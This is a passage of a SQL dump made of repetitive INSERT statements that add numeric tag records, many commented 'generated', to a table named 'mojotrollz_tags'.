(3218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3219, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3219, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3220, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3220, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3221, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3221, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3222, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3222, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3223, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3223, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3224, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3224, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3225, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3225, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3226, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3227, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3227, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3228, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3228, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3229, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3229, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3230, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3230, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3230, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3230, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3230, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3230, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3231, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3232, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3233, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3233, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3234, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3234, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3234, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3234, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3234, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3235, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3235, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3236, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3237, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3237, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3238, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3239, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3239, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3240, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3241, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3241, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3241, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3241, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3242, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3242, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3242, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3242, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3242, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3243, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3243, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3243, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3243, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3243, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3244, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3244, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3244, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3244, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3245, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3245, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3245, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3245, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3245, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3246, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3246, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3246, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3246, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3247, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3248, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3248, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3248, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3248, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3248, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3249, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3250, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3251, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3252, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3253, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3253, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3254, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3254, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3254, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3254, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3254, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3255, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3255, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3255, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3255, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3256, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3256, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3256, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3256, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3257, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3258, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3258, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3260, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3261, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3263, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3263, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3265, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3265, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3265, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3265, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3265, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3266, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3266, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3266, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3266, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3267, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3267, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3267, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3267, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3267, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3268, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3268, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3268, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3268, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3269, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3269, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3269, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3269, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3269, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3270, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3270, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3270, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3270, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3270, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3271, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3271, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3271, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3271, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3271, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3272, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3272, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3272, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3272, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3273, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3273, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3273, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3273, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3273, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3274, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3274, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3274, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3274, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3275, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3275, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3275, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3275, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3275, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3276, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3276, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3276, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3276, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3277, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3277, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3277, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3277, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3278, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3278, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3278, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3278, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3279, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3279, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3279, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3279, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3279, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3280, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3280, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3280, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3280, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3280, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3281, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3281, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3281, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3282, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3282, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3282, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3282, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3282, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3283, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3283, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3283, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3283, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3283, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3284, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3284, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3284, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3284, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3284, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3285, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3285, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3285, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3285, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3285, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3286, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3286, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3286, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3286, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3286, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3287, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3287, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3287, 1, 30, 0, 'generated'); INSERT INTO 